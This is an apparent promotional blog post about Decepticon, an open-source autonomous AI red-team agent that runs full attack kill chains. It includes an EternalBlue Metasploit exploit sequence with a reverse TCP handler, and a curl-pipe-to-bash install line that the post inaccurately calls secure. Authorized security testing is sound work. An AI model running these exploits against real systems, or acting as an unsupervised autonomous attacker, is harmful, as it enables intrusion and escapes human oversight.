Decepticon: The AI Hacker That Runs Full Kill Chains

B
Bright Coding
Author
Share:
Decepticon: The AI Hacker That Runs Full Kill Chains
Advertisement

Decepticon: The AI Hacker That Runs Full Kill Chains — Not Just Nmap Scans

Your security team just spent $50,000 on a penetration test. The deliverable? A 200-page PDF with nmap output, Nessus screenshots, and a CVSS calculator showing "critical" on everything. Meanwhile, real adversaries are living in your network for 287 days before detection, pivoting through Active Directory, exfiltrating data via DNS tunneling, and you never saw them coming.

Here's the dirty secret the security industry doesn't want you to know: Most "AI hacking tools" are just chatbots wrapped around scanners. They run nmap, paste the output into GPT-4, and call it "autonomous." That's not offensive security. That's automation theater.

But what if an agent could actually think like an attacker? What if it wrote its own operational plans, adapted when firewalls blocked its payload, escalated privileges through unpatched CVEs, and established persistent C2 channels — all while respecting legal boundaries with formal Rules of Engagement?

Meet Decepticon, the autonomous red team agent from PurpleAILAB that's making security professionals question everything they thought they knew about AI-driven penetration testing. With a 98.08% pass rate on the XBOW validation benchmarks, this isn't a demo. It's a weapon for defenders who finally want to see what real adversaries see.


What Is Decepticon? The Autonomous Red Team Agent That Actually Hacks

Decepticon is an open-source autonomous red team agent developed by PurpleAILAB, a research collective focused on offensive security automation. Unlike the flood of "AI security tools" that flooded GitHub in 2023-2024, Decepticon isn't a wrapper around existing scanners. It's a purpose-built system for executing complete cyber kill chains — from initial reconnaissance through exploitation, privilege escalation, lateral movement, and command-and-control establishment.

The project's tagline cuts straight to the point: "Another AI hacker? Let us guess — it runs nmap and writes a report." That skepticism reflects the creators' deep understanding of what separates real red teaming from compliance checkbox exercises.

Why is Decepticon trending now? Three forces converged:

  • The AI agent revolution finally produced language models capable of reasoning about complex, multi-step offensive operations
  • Enterprise security teams grew exhausted by traditional pentest deliverables that don't reflect real attacker behavior
  • The "Offensive Vaccine" concept emerged — using autonomous offense to systematically harden defenses through attack→defend→verify loops

Decepticon operates under professional discipline that mirrors human red team operations. Before any packet hits the wire, it generates complete engagement documentation: Rules of Engagement (RoE), Concept of Operations (ConOps), Deconfliction Plans, and Operational Plans (OPPLAN) mapped to MITRE ATT&CK. This isn't just ethical hygiene — it's operational necessity. The agent needs constraints to operate effectively, just as human operators need clear authorities and boundaries.

The project is actively maintained with comprehensive documentation, an active Discord community, and a public roadmap toward the Offensive Vaccine vision. It's licensed under Apache 2.0, making it accessible for both research and commercial adaptation.


Key Features: What Makes Decepticon Actually Autonomous

Decepticon's architecture reveals why it outperforms superficial competitors. These aren't marketing bullet points — they're engineering decisions that solve real problems in autonomous offensive operations.

Real Kill Chain Execution, Not Scanner Orchestration

Most "AI pentest" tools chain together existing scanners with LLM-generated summaries. Decepticon reads its OPPLAN and pursues objectives through whatever path opens up. If a direct exploit fails, it pivots to credential harvesting. If phishing is out of scope per RoE, it automatically explores alternative initial access vectors. The agent maintains operational context across phases — recon findings inform exploitation choices, which inform post-exploitation priorities.

Persistent Interactive Shell Management

Here's where Decepticon exposes how shallow other tools are. Real offensive tools are interactive: msfconsole, sliver-client, evil-winrm, bloodhound-python. Most automation frameworks choke on these because they expect batch commands with predictable output. Decepticon runs every command inside persistent tmux sessions with automatic prompt detection. When msfconsole drops its msf6 > prompt, the agent recognizes the state change and sends follow-up commands natively — no brittle expect scripts, no output parsing hacks.

Hardened Sandbox Isolation

Security operations demand isolation, but many AI tools run on the host system or in minimal containers. Decepticon implements a two-network architecture: management services (LiteLLM, PostgreSQL, LangGraph, Web dashboard) operate on decepticon-net, while the sandbox, C2 servers, and target networks live on sandbox-net. The sandbox runs full Kali Linux — not a stripped-down image — ensuring compatibility with the complete offensive toolkit. LangGraph drives sandbox operations via the Docker socket, maintaining clean separation between control plane and operational environment.

Neo4j Knowledge Graph for Operational Memory

Adversaries don't forget what they've learned. Neither does Decepticon. The Neo4j knowledge graph is dual-homed across both networks, allowing the agent to persist findings from sandbox operations while maintaining management-plane accessibility. BloodHound data, credential relationships, host inventories, and vulnerability chains become queryable intelligence that drives subsequent operational decisions.

16 Specialist Agents with Fresh Context Windows

Decepticon's agent architecture mirrors military special operations: dedicated teams for specific mission phases. The roster includes Orchestration, Reconnaissance, Exploitation, Post-Exploitation, Vulnerability Research, and domain specialists for Active Directory, Cloud environments, Smart Contracts, Reverse Engineering, and Intelligence Analysis. Critical design decision: each agent receives a fresh context window per objective, eliminating the accumulated noise that degrades long-horizon LLM performance.

Credential-Aware Model Fallback Chains

Different operations demand different model capabilities. Decepticon implements tier-based provider fallback: you declare which API credentials you have, and the system builds primary→fallback chains automatically. The eco profile (default) assigns HIGH-tier models to orchestrator/exploiter/patcher/analyst agents, MID-tier to execution agents, and LOW-tier to reconnaissance. The max profile puts everything on HIGH for high-value targets; test uses LOW everywhere for development and CI pipelines. Supported providers span Anthropic, OpenAI, Google Gemini, MiniMax, DeepSeek, xAI, Mistral, OpenRouter, Nvidia NIM, and local Ollama instances — plus subscription OAuth for Claude Max/Pro/Team, ChatGPT tiers, Gemini Advanced, Copilot Pro, SuperGrok, and Perplexity Pro.


Use Cases: Where Decepticon Transforms Security Operations

Enterprise Purple Team Operations

Traditional purple teams struggle with scale. Human red teamers are expensive, scarce, and can't operate 24/7. Decepticon enables continuous purple team exercises where the autonomous agent operates against production-like environments while blue teamers validate detection and response capabilities. The generated OPPLAN and MITRE ATT&CK mapping provide immediate feedback on coverage gaps.

Security Control Validation

CISOs need evidence that expensive security investments actually work. Decepticon executes controlled attack scenarios against specific controls: "Can our EDR detect credential dumping?" "Does our network segmentation prevent lateral movement?" The agent's detailed logging and LangSmith traces provide auditable evidence of control effectiveness or failure.

Vulnerability Research and Exploit Development

The dedicated Vulnerability Research agent and Reversing specialist enable systematic analysis of unknown systems. Decepticon can be pointed at custom applications, embedded systems, or novel network protocols with the directive to identify and exploit weaknesses — generating detailed technical reports with proof-of-concept code.

Cloud Security Assessment

Cloud environments present unique attack surfaces: misconfigured IAM policies, exposed storage buckets, vulnerable serverless functions, and cross-account trust relationships. The Cloud Domain Specialist understands AWS, Azure, and GCP attack patterns, executing cloud-native kill chains that traditional network-focused tools miss entirely.

Blockchain and Smart Contract Auditing

The Smart Contracts specialist extends Decepticon's capabilities into Web3 security. It can analyze Solidity code, identify reentrancy vulnerabilities, manipulate oracle inputs, and exploit DeFi protocol logic — all with the same operational discipline applied to network penetration tests.


Step-by-Step Installation & Setup Guide

Decepticon's installation prioritizes operational security and reproducibility through containerization. Here's the complete setup process.

Prerequisites

Before installation, verify your environment meets these requirements:

  • Docker (latest stable) and Docker Compose v2
  • macOS: Apple Silicon or Intel
  • Linux: amd64 or arm64 architecture
  • Windows: WSL2 with Ubuntu or Kali Linux (native Windows is explicitly unsupported)

One-Line Installation

From a supported shell, execute the official installer:

# Download and execute the installation script
curl -fsSL https://decepticon.red/install | bash

This script handles dependency verification, Docker image pulls, and initial configuration structure creation.

Interactive Onboarding

After installation, run the setup wizard to configure your AI providers and operational preferences:

# Launch interactive configuration (provider selection, API keys, model profile)
decepticon onboard

The wizard will prompt for:

  • Primary AI provider and API credentials
  • Fallback provider chain (for resilience during operations)
  • Model profile selection: eco (default, cost-optimized), max (performance-optimized), or test (minimal cost for development)
  • Operational preferences and default engagement parameters

Starting the Complete Environment

Launch all services with a single command:

# Start terminal CLI + web dashboard (accessible at http://localhost:3000)
decepticon

This initializes:

  • Management network (decepticon-net) with LiteLLM, PostgreSQL, LangGraph, and Web dashboard
  • Sandbox network (sandbox-net) with Kali Linux operational environment
  • Neo4j knowledge graph (dual-homed for cross-network persistence)
  • Persistent tmux session infrastructure for interactive tool management

Development Setup (Contributors)

For those modifying Decepticon itself:

# Clone the repository
git clone https://github.com/PurpleAILAB/Decepticon.git
cd Decepticon

# Full OSS UX validation: launcher → onboard → CLI on local code
make dogfood

# Daily development loop with backend hot-reload via compose watch
make dev

The make dogfood target is particularly valuable — it validates the complete user experience on your modified code before submitting contributions.


REAL Code Examples: Inside Decepticon's Operations

Let's examine actual implementation patterns from the Decepticon repository, with detailed technical analysis of what makes each significant.

Example 1: Installation and Environment Bootstrap

The installation demonstrates Decepticon's commitment to reproducible, secure deployment:

Advertisement
# Secure pipe-to-shell with explicit flags: fail on error, silent, follow redirects
curl -fsSL https://decepticon.red/install | bash

# Interactive setup wizard — not hardcoded credentials in config files
decepticon onboard   # Configures provider, API key, model profile

# Single-command environment launch
decepticon           # Starts terminal CLI + web dashboard at http://localhost:3000

Why this matters: The -fsSL flags ensure the script fails completely on any error rather than partially executing. The separation of install, onboard, and runtime commands reflects operational security principles — credentials never touch disk in the installation phase, and the interactive wizard enables secure secret entry. The localhost dashboard binding (:3000) keeps management interfaces off external networks by default.

Example 2: Development and Contribution Workflow

Decepticon's Makefile targets reveal sophisticated development practices:

git clone https://github.com/PurpleAILAB/Decepticon.git
cd Decepticon

# Full OSS UX validation: tests complete user journey on local modifications
make dogfood  # launcher → onboard → CLI

# Daily development with hot-reload for rapid iteration
make dev      # Backend hot-reload (compose watch) — daily dev loop

Technical insight: make dogfood is derived from the security industry practice of "eating your own dog food" — using your own product operationally. This target validates that modifications don't break the complete user experience. The make dev target leverages Docker Compose's watch mode for file-system synchronized hot reloading, eliminating container rebuild cycles during development. This is critical for a project where testing requires full environment orchestration.

Example 3: Network Architecture Implementation

While not explicit shell commands, Decepticon's architecture manifests in Docker Compose configurations. The two-network design implements defense-in-depth:

# Conceptual representation of Decepticon's network isolation
networks:
  decepticon-net:
    # Management plane: AI orchestration, database, web interface
    # Isolated from operational traffic
  sandbox-net:
    # Operational plane: Kali sandbox, C2 servers, target networks
    # Compromise here does not expose management credentials

services:
  neo4j:
    networks:
      - decepticon-net  # Agent queries for operational context
      - sandbox-net     # Sandbox writes findings during execution
    # Dual-homing enables secure knowledge persistence across isolation boundary

Security analysis: This architecture directly addresses a critical vulnerability in simpler AI security tools: single-network deployment means a compromised target can pivot to AI provider credentials. Decepticon's isolation ensures that even complete sandbox compromise cannot access management plane secrets. The Neo4j dual-homing is carefully designed — read access from management, write access from sandbox, with Neo4j's own authentication providing the control point.

Example 4: Interactive Session Management

Decepticon's tmux-based session handling solves a genuinely hard problem in offensive automation:

# Conceptual operation: Decepticon establishes persistent session
tmux new-session -d -s ops-001  # Detached session for operational continuity

# When msfconsole launches interactively...
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 10.0.0.5
msf6 exploit(ms17_010_eternalblue) > exploit

# Agent detects prompt state change and continues without human intervention
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.5:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.0.0.5:445 - Host is likely VULNERABLE to MS17-010!

Why other tools fail: Traditional expect-style automation breaks when prompt formats change, colors are enabled, or output contains unexpected characters. Decepticon's prompt detection likely combines multiple signals — shell prompt patterns, timing analysis, and tool-specific state machines — to robustly identify when interactive tools are ready for input. This enables genuine automation of tools that were designed for human interaction.


Advanced Usage & Best Practices

Model Profile Selection Strategy

Choose profiles based on operational value and budget constraints. The eco profile's tiered allocation isn't arbitrary — orchestration and exploitation require reasoning depth (HIGH), while reconnaissance is often pattern-matching that LOW-tier models handle adequately. For bug bounty operations where a single finding pays thousands, max eliminates model capability as a limiting factor. For continuous monitoring at scale, eco maintains sustainable economics.

Operational Security for Agent Credentials

Your AI provider API keys become high-value targets. Decepticon's onboard wizard stores credentials securely, but consider: rotating keys between engagements, using provider-specific IAM constraints where available (e.g., Anthropic's API key scoping), and monitoring for anomalous usage patterns that might indicate key compromise.

Customizing Engagement Packages

The auto-generated RoE/ConOps/OPPLAN templates provide baseline discipline, but mature operations should customize these. Define explicit scope boundaries, establish deconfliction channels with blue teams, and specify reporting requirements before launching operations. Decepticon's structure enforces this — use it.

Knowledge Graph Hygiene

Neo4j performance degrades with unconstrained growth. Schedule periodic graph maintenance: archive completed engagements, deduplicate host findings, and prune obsolete credential relationships. The knowledge graph is operational intelligence — treat it as such.

LangSmith Trace Analysis

Decepticon's LangSmith integration provides unprecedented visibility into agent reasoning. Review traces from failed operations to identify: model hallucinations causing incorrect tool selection, context window limitations truncating critical information, and prompt injection vulnerabilities in tool output processing.


Comparison with Alternatives: Why Decepticon Wins

Capability Decepticon PentestGPT Cyber-AutoAgent MAPTA Strix
Full kill chain execution ✅ Native ❌ Scanner wrapper ⚠️ Partial ⚠️ Partial ❌ Limited
Interactive shell automation ✅ tmux + prompt detection ❌ Batch only ❌ Batch only ❌ Batch only ⚠️ Limited
Pre-engagement documentation ✅ RoE/ConOps/OPPLAN auto-gen ❌ None ❌ None ❌ None ❌ None
Network isolation architecture ✅ Two-network + sandbox ❌ Host or single container ❌ Host or single container ❌ Host or single container ⚠️ Basic container
Knowledge graph persistence ✅ Neo4j dual-homed ❌ None ❌ None ❌ None ❌ None
XBOW benchmark performance 98.08% Not published Not published Not published Not published
Specialist agent architecture ✅ 16 agents, fresh context ❌ Single agent ❌ Single agent ❌ Single agent ❌ Single agent
Model fallback chains ✅ Credential-aware, tiered ❌ Single provider ❌ Single provider ❌ Single provider ❌ Single provider
Open source license ✅ Apache 2.0 ✅ Open source Varies Varies Varies

The verdict: Decepticon is the only open-source tool that combines genuine autonomous operation with professional operational discipline. Others automate scanners; Decepticon automates the red teamer.


FAQ: What Developers and Security Teams Ask

Is Decepticon legal to use?

Decepticon is legal for authorized security testing with explicit written permission from system owners. The project includes prominent disclaimers emphasizing this requirement. Unauthorized access remains illegal regardless of tool sophistication.

How does Decepticon compare to commercial AI pentest platforms?

The XBOW benchmark comparison shows Decepticon outperforming commercial alternatives at 98.08% pass rate. The open-source nature enables customization impossible with black-box commercial tools, while the professional documentation generation meets enterprise compliance requirements.

What AI models work best with Decepticon?

The eco profile optimizes cost-performance with tiered allocation. For critical operations, Claude 3.5 Sonnet and GPT-4o demonstrate strongest reasoning for exploitation decisions. Local Ollama deployment works for test profiles but lacks capability for complex operations.

Can Decepticon be used for blue team defense?

Yes — the planned Offensive Vaccine loop explicitly bridges offense to defense. Current capabilities enable purple team exercises where Decepticon's detailed operational logs validate detection and response capabilities.

How do I contribute to Decepticon development?

Clone the repository, use make dogfood to validate changes, and follow the contributing guide. The Discord community provides real-time collaboration.

What targets can Decepticon attack?

Any authorized target: internal networks, cloud environments, web applications, Active Directory domains, container orchestration platforms, and smart contract deployments. The specialist agent architecture enables domain-specific expertise.

Is there a managed/SaaS version available?

Currently Decepticon is self-hosted only. The containerized architecture enables straightforward deployment to private infrastructure, maintaining operational security by keeping sensitive data and credentials within your control.


Conclusion: The Future of Security Is Autonomous — Are You Ready?

Decepticon represents a fundamental shift in offensive security capabilities. Not because it uses AI — everyone does that now — but because it uses AI correctly: as the reasoning layer for genuine operational execution, not as marketing veneer on decade-old scanning technology.

The 98.08% XBOW benchmark pass rate isn't a vanity metric. It proves that autonomous agents can execute complex, multi-step offensive operations with reliability that approaches human expert performance — at machine speed, machine persistence, and machine scale.

For security teams, this is both threat and opportunity. Adversaries will adopt these capabilities. The question is whether defenders will leverage the same technology to understand their exposure before attackers do.

My assessment: Decepticon is the most mature open-source autonomous red team platform available today. The operational discipline — formal engagement documentation, network isolation, knowledge persistence — demonstrates that its creators understand red teaming as a profession, not a stunt. The path to Offensive Vaccine, turning autonomous attack findings into systematic defense improvements, could redefine how we approach security validation entirely.

Your next step: Clone Decepticon on GitHub, run through the onboarding, and execute your first controlled engagement. The security industry is about to bifurcate: organizations that understand autonomous offense, and those that become victims of it. Choose your side today.


Star the repository, join the Discord community, and follow the project's evolution toward the Offensive Vaccine vision.

Advertisement

Comments (0)

No comments yet. Be the first to share your thoughts!

Leave a Comment

Apps & Tools Open Source

Apps & Tools Open Source

Bright Coding Prompt

Bright Coding Prompt

Categories

Advertisement
Advertisement
Advertisement